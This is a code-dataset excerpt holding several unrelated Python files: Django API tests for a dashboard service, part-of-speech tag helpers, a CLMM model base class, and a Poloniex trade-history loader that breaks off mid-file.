'type_id': module_type.id,\n 'description': '',\n 'info': [],\n 'options': {},\n 'order': 1,\n }\n data = self._get_dashboard_payload()\n data['modules'] = [module]\n\n resp = self.client.post(\n '/dashboard', to_json(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(400))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_failure_rolls_back_transaction(self):\n module_type = ModuleTypeFactory()\n module = {\n 'slug': 'bad slug',\n 'title': 'bad slug',\n 'type_id': module_type.id,\n 'description': '',\n 'info': [],\n 'options': {},\n 'order': 1,\n }\n data = self._get_dashboard_payload()\n data['modules'] = [module]\n\n resp = self.client.post(\n '/dashboard', to_json(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(400))\n assert_that(Dashboard.objects.count(), equal_to(0))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_with_reused_slug_is_bad_request(self):\n data = self._get_dashboard_payload()\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n second_resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(second_resp.status_code, equal_to(400))\n assert_that(Dashboard.objects.count(), equal_to(1))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_dashboard_failing_validation_returns_json_error(self):\n data = {\n 'slug': 'my-dashboard',\n 'title': 'My dashboard',\n 'strapline': 'Invalid',\n }\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type='application/json',\n HTTP_AUTHORIZATION='Bearer correct-token')\n response_dictionary = json.loads(resp.content)\n expected_message = \"strapline: Value u'Invalid' is not a valid choice.\"\n\n assert_that(resp.status_code, equal_to(400))\n assert_that(response_dictionary['status'], equal_to('error'))\n assert_that(response_dictionary['message'],\n equal_to(expected_message))\n", "sub_path": "stagecraft/apps/dashboards/tests/views/test_dashboard.py", "file_name": "test_dashboard.py", "file_ext": "py", "file_size_in_byte": 19366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.test.TestCase", "line_number": 24, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 38, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 38, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 41, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 43, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "hamcrest.has_entries", "line_number": 45, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 47, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "hamcrest.has_entries", "line_number": 49, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 26, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 53, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 56, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 56, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 56, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 58, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 58, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 61, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 62, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 66, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 66, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 70, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 70, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 79, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 79, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 79, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 83, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 83, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 72, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 87, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.views.dashboard.recursively_fetch_dashboard", "line_number": 89, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 90, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 90, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 94, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.views.dashboard.recursively_fetch_dashboard", "line_number": 96, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 97, "usage_type": "call"}, {"api_name": "hamcrest.is_", "line_number": 97, "usage_type": "call"}, {"api_name": "hamcrest.none", "line_number": 97, "usage_type": "call"}, {"api_name": "django_nose.tools.assert_redirects", "line_number": 107, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 99, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 114, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 115, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 116, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 119, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 122, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 129, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 130, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 131, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 132, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 133, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 134, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 137, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 138, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 139, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 142, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 147, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 148, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 149, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 149, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 150, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 150, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 153, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 154, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 155, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 160, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 161, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 161, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 164, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 165, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 166, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 182, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 189, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 190, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 191, "usage_type": "call"}, {"api_name": "hamcrest.has_entries", "line_number": 192, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 193, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 196, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 196, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 199, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 200, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 201, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 217, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 224, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 225, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 225, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 228, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 240, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 240, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 241, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 241, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 230, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 245, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 251, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 251, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 252, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 253, "usage_type": "call"}, {"api_name": "hamcrest.has_entries", "line_number": 254, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 243, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 278, "usage_type": "name"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 282, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 289, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.JsonEncoder", "line_number": 289, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 293, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 293, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 294, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.get", "line_number": 295, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 295, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 295, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 295, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 280, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 300, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 305, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.JsonEncoder", "line_number": 305, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 309, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 309, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 298, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 312, "usage_type": "name"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DepartmentFactory", "line_number": 346, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 351, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 355, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 355, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 356, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 356, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 356, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 356, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 356, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 344, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 363, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 367, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 367, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 368, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 368, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 368, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 368, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 368, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 358, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 376, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 380, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 380, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 381, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 381, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 381, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 381, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 381, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 370, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 389, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 393, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 393, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 394, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 394, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 394, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 394, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 394, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 383, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 401, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.first", "line_number": 405, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 405, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 405, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 407, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 407, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 408, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 408, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 409, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 410, "usage_type": "call"}, {"api_name": "hamcrest.has_property", "line_number": 410, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 411, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 396, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 415, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.to_json", "line_number": 436, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 440, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 440, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.first", "line_number": 441, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 441, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 441, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 442, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 442, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 413, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 446, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.to_json", "line_number": 460, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 464, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 464, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 444, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 468, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.to_json", "line_number": 482, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 486, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 486, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 487, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 487, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 487, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 487, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 487, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 466, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 494, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 499, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 503, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 503, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 504, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 504, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 505, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 505, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 505, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 505, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 505, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 489, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 516, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 519, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 522, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 522, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 523, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 523, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 524, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 525, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 507, "usage_type": "call"}]} +{"seq_id": "124140215", "text": "## English Command\n#java -mx4g -cp \"*\" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -annotators \"tokenize,ssplit,pos,lemma,parse,sentiment\" -port 9000 -timeout 30000\n\n## Arabic Command\n#java -Xmx4g -cp \"*\" edu.stanford.nlp.pipeline.StanfordCoreNLPServer \\\n# -serverProperties StanfordCoreNLP-arabic.properties \\\n# -preload tokenize,ssplit,pos,parse \\\n# -status_port 9005 -port 9005 -timeout 15000\n\nfrom collections import Counter\n\nADJ=[\"JJ\",\"JJR\",\"JJS\"]\nADV=[\"RB\" ,\"RBR\" ,\"RBS\",\"RP\",\"WRB\"]\nVB=[\"MD\",\"VB\",\"VBD\",\"VBG\",\"VBN\",\"VBP\",\"VBZ\"]\nNN=[\"NN\",\"NNS\",\"NNP\",\"NNPS\"]\nPRN=[\"DT\" ,\"EX\", \"PDT\" ,\"PRP\",\"PRP$\",\"WDT\",\"WP\",\"WP$\"]\nOTHR=[\"CD\" ,\"LS\",\"POS\",\"SYM\",\"TO\" , \"UH\", \"INF\" , \"FW\"]\nPUNCT=[\".\", \",\",\":\",\"(\",\")\"]\nCLAUSE=[\"SBAR\",\"SBARQ\",\"SINV\",\"SQ\"]\n\n\ndef getType(tag):\n if tag in ADJ: return \"ADJ\"\n elif tag in ADV: return \"ADV\"\n elif tag in VB: return \"VB\"\n elif tag in NN: return \"NN\"\n elif tag in PRN: return \"PRN\"\n elif tag in OTHR: return \"OTHR\"\n elif tag in PUNCT: return \"PUNCT\"\n else : return tag\n\n\ndef isClause(tag):\n if tag in CLAUSE:\n return True\n return False\n\n\n##Other\n## CD - Cardinal Number\n##LS - List Item Marker\n##POS - Possessive Ending\n## SYM - Symbol\n##UH -Interjection\n##TO - infinitive to\n## Pronouns\n##DT -Determiner\n##EX -Existential There\n##PDT -Predeterminer (Both)\n##PRP -Pronoun , Personal\n##PRP$ -Pronoun , Possessive\n##WDT -WH Determiner\n##WP -WH Personal Pronoun\n##WP$ -WH possessive Pronoun\n## Verb Tags\n# MD - VERB, modal Auxiliary\n# VB - Verb, base form\n# VBD - Verb, past tense\n# VBG - Verb, gerund or present participle\n# VBN - Verb, past participle\n# VBP - Verb, non-3rd person singular present\n# VBZ - Verb, 3rd person singular present\n##Nouns\n##NN Noun , singular or mass\n##NNS Noun , plural\n##NNP Noun , proper singular\n##NNPS Noun , Proper Plural\n##Conjunctions\n# CC -Coordinating Conjunction\n## Preposition\n##IN - Subordinating Conjunction / Preposition\n## Adjectives\n# JJ - Adjective\n# JJR - Adjective, comparative\n# JJS - Adjective, superlative\n## Adverb\n# RB -Adverb\n# RBR -Comparative Adverb\n# RBS -Superlative adverb\n# RP - Particle Adverb\n# WRB - Wh- adverb\n\n\n\n\n\n\n\n\ndef defaultArabicPennTags():\n PennTags=Counter({'CC':0 , 'CD':0 , 'DT':0 , 'EX':0 , \"FW\":0 , \"IN\":0 , \"JJ\":0 , \"JJR\":0 , \"JJS\":0 , \"LS\":0,\n \"MD\":0 , \"NN\":0 ,\"NNS\":0 ,\"NNP\":0 , \"NNPS\":0 , \"PDT\":0 , \"POS\":0,\"PRP\":0 , \"PRP$\":0 ,\n \"RB\":0 , \"RBR\":0 , \"RBS\":0 , \"RP\":0 , \"SYM\":0 , \"TO\":0 , \"UH\":0 , \"VB\":0 ,\"VBD\":0 ,\n \"VBG\":0 , \"VBN\":0 , \"VBP\":0 , \"VBZ\":0 , \"WDT\":0 , \"WP\":0 , \"WP$\":0 , \"WRB\":0 , \"JJR\":0 ,\"ADJ_NUM\":0,\n \"VN\":0 , \"NN\":0 ,\"DTJJ\":0 ,\"DTNNPS\":0 , \"DTNNP\":0 , \"DTNNS\":0 , \"DTNN\":0 , \"NOUN_QUANT\":0 , \"DTNOUN_QUANT\":0 , \"DTJJR\":0 , \"PUNC\":0\n })\n return PennTags\n", "sub_path": "complexity/wiki_model/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 2824, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.Counter", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "538817879", "text": "\"\"\"Model class\"\"\"\nimport numpy as np\nimport six\nimport clmm\nfrom clmm.core import CLMMBase\n\n\nclass Model(CLMMBase):\n \"\"\"A generalized superclass of what a model is. A model has parameters\n and a functional form. The parameters may vary or be fixed.\n\n Attributes\n ----------\n func : callable\n functional form of the model, should be wrapped by the class\n\n independent_vars : array-like of str, optional\n arguments to func that are independent variables (default to None)\n\n params : dict of floats, optional\n Dictionary of parameters\n\n \"\"\"\n\n\n def __init__(self, func=None, independent_vars=None, params=None):\n \"\"\"\n Parameters\n ----------\n func : callable, optional\n functional form of the model, should be wrapped by the class\n\n independent_vars : array-like of str, optional\n arguments to func that are independent variables (default to None)\n\n params : dict of floats, optional\n Dictionary of parameters\n\n \"\"\"\n\n if callable(func) or func is None:\n self.func = func\n else:\n raise TypeError('func should be a callable')\n\n if (np.iterable(independent_vars) and not isinstance(independent_vars, dict)\n and all(isinstance(var, str) for var in independent_vars)\n and not isinstance(independent_vars, six.string_types)) \\\n or (independent_vars is None):\n self.independent_vars = independent_vars\n else:\n raise TypeError('independent_vars should be a list of str or None')\n\n\n if isinstance(params, dict) or params is None:\n self.params = params\n else:\n raise TypeError('params should be a dictionary')\n", "sub_path": "clmm/models/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1779, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "clmm.core.CLMMBase", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.iterable", "line_number": 46, "usage_type": "call"}, {"api_name": "six.string_types", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "67179338", "text": "from poloniex.app import SyncApp\nimport argparse\nfrom exchangeapi.interface.model import TradeSocket,db_session\nfrom datetime import datetime,timedelta\nfrom sqlalchemy import func\nfrom exchangeapi.interface.trade import Trade\n\ndef get_dates(start,end=datetime.today()+timedelta(days=1)):\n date_list = []\n while start < end:\n date_list.append(start)\n start = start+timedelta(days=1)\n return date_list\n\ndef load_results_tradesocket(results,pair):\n print(\"Results to upload:\" + str(len(results)))\n i = 1\n for result in results:\n print(\"submitting row \" + str(i) + \" \" + str(result[\"globalTradeID\"]) )\n print(\"date\"+result[\"date\"])\n i+=1\n trade = Trade(\n \"t\",\n result['tradeID'],\n result['date'],\n pair,\n result['type'],\n result['rate'],\n result['amount'],\n )\n trade.commit()\n\n\ndef get_results(app,pair,start_datetime_obj,end_datetime_obj):\n return app.public.returnTradeHistory(currency_pair=pair,\n start=start_datetime_obj,\n end=end_datetime_obj)\n\ndef load_paged(app,pair,entry,end=None):\n continue_paging=True\n end_datetime_obj=None\n if end is None:\n end_datetime_obj = entry+timedelta(days=1)-timedelta(seconds=1)\n else:\n end_datetime_obj=end\n while continue_paging==True:\n results = app.public.returnTradeHistory(currency_pair=pair,\n start=entry,\n end=end_datetime_obj)\n if len(results) > 0:\n load_results_tradesocket(results,pair)\n\n # check for paging results\n if len(results) == 50000:\n print(\"len hit 50000\")\n continue_paging=True\n entry=datetime.strptime(results[-1][\"date\"],'%Y-%m-%d %H:%M:%S')+timedelta(seconds=1)\n print(\"new start:\"+ str(entry))\n else:\n #done\n continue_paging=False\n\ndef parse_startend(args):\n app = SyncApp(api_key=args.api_key,\n api_sec=args.api_secret)\n\n pair = args.pair\n\n start_datetime_obj = datetime.strptime(args.start,\"%Y-%m-%d %H:%M:%S\")\n end_datetime_obj = datetime.strptime(args.end,\"%Y-%m-%d %H:%M:%S\")\n dates = get_dates(start_datetime_obj,end_datetime_obj)\n dates.append(end_datetime_obj)\n if not args.start:\n raise RuntimeError(\"missing arg start_date\")\n #db_session.query(RestTrade).delete()\n #db_session.commit()\n index_count = len(dates)\n i = 1\n for entry in dates:\n print(\"starting date: \" + str(entry))\n if i==index_count:\n load_paged(app,pair,entry,end_datetime_obj)\n else:\n load_paged(app,pair,entry)\n\ndef parse_hist(args):\n app = SyncApp(api_key=args.api_key,\n api_sec=args.api_secret)\n\n pair = args.pair\n\n start_datetime_obj = datetime.strptime(args.start,\"%Y-%m-%d\")\n dates = get_dates(start_datetime_obj)\n\n if not args.start:\n raise RuntimeError(\"missing arg start_date\")\n #db_session.query(RestTrade).delete()\n #db_session.commit()\n for entry in dates:\n print(\"starting date: \" + str(entry))\n load_paged(app,pair,entry)\n\ndef parse_current(args):\n app = SyncApp(api_key=args.api_key,\n api_sec=args.api_secret)\n\n pair = args.pair\n start_date = db_session.query(func.max(TradeSocket.timestamp)).one()[0] + timedelta(seconds=1)\n dates = get_dates(start_date)\n for entry in dates:\n print(\"starting datetime: \" + str(entry))\n load_paged(app,pair,entry)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n subparser= parser.add_subparsers(help=\"subcommand help\")\n 